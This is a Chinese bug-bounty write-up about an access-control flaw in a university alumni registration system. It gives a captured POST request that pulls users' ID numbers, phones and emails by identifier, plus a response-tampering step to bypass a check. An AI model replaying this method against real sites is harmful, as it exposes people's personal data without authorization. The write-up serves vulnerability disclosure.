记一次对edusrc某证书站的漏洞挖掘
大佬们勿喷
图片不清晰的话点一下图片放大就可以看清楚了
目标站www.xxx.edu.cn/xyxt-v5/web/index/register.zf
可以看到这样一个功能点
尝试写个日期?
好家伙 整出来了一半铭感信息 那可必须整出几个花姑娘才行
不过,这些东西价值不大,应该怎么深入呢?我们先把这个xyid先记下,后面有大用!!! 抓包看一手
通过测试后面的流程,发现获得信息的就是这个xyid
点一下完善信息查看包
接下来是重点哦,,
正常流程是:只有当信息输入正确的时候,才可以进行下一步,但是这里没有进行鉴权,直接修改响应包进行绕过。
第一步我们修改返回包 Ture基本操作 尝试绕过(就是改个返回包吹得怎么那么一本正经)
来来来 我们看看这样一个页面
接着我们看一下刚开始的xyid 换上去
可以看见用户敏感信息爆出来了 针对不同用户才有不同的情况
只要我们通过获取到大量的xyid=就行,就可以批量获取了,至于获取的方法,他自己暴露了。
反思: 虽然他这个xyid进行了加密,但是他却再其他地方把用户的xyid暴露出来,相当于没有作用。
再看看注册功能
然后我们将收集一些简单的xyid进行验证45724E0XXXXXXXXXXXXXXXXXXD4361FEB8B70FBXXXXXXXXXXXXXXXXXX9155E3b66ca29XXXXXXXXXXXXXXXXXX8dfcde45724E09XXXXXXXXXXXXXXXXXX4361FEB8B70FBXXXXXXXXXXXXXXXXXXB9155E1B2370AEXXXXXXXXXXXXXXXXXX282D3011D6627XXXXXXXXXXXXXXXXXXF868以下是一些例子:这些都是未注册的O
通过xyid获取个人信息:
POST /xyxt-v5/web/index/queryDataByXyid.zf HTTP/1.1
Host: XXXXXX.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://XXXXXXX.lzu.edu.cn/xyxt-v5/web/index/register.zf
Content-Length: 37
Cookie: JSESSIONID=30A4F370CACACF9C18601FAA19F33A5A
X-Forwarded-For: 127.0.0.1
DNT: 1
Connection: close
xyid=76AC85FAXXXXXXXXXXXXXXXX12F6C
可以看到每个信息都全部显示出来
在这个流程成也可以修改别人的资料。在跳到第二步的时候,继续修改包。
接着看看已经注册过的
总结危害:1.可以修改用户的资料,并注册2.可以通过手段去未授权查看别人的资料,如果别人资料填写完整,可查看身份证,QQ,邮箱,电话,姓名,学号等。如果未填写完整,可以看见身份证,姓名等...
本文始发于微信公众号(疯猫网络):记一次对edusrc某证书站的漏洞挖掘
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论